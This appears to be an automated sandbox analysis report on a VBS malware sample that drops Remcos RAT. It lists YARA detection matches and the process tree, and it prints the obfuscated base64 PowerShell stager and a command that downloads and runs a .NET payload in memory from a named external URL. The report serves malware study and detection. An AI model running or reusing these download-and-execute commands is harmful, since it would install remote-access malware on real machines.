Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00436FEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00401E65 appears 34 times
Source: sostener.vbs | Initial sample: Strings found which are bigger than 50
Source: 3.2.powershell.exe.29b32a20000.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.powershell.exe.23a3ac26860.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 36.2.powershell.exe.1b993cd6900.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 3.2.powershell.exe.29b1a88d8c0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 36.2.powershell.exe.1b994479a60.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 3.2.powershell.exe.29b1bb69730.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 21.2.powershell.exe.23a3b3ccdd8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                        Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@70/58@4/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 27_2_00417952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 27_2_0040F474
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 27_2_0041B4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 27_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 27_2_0041AA4A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-3PWW8O
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcroe1lr.4lx.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: sostener.vbs | ReversingLabs: Detection: 13%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t 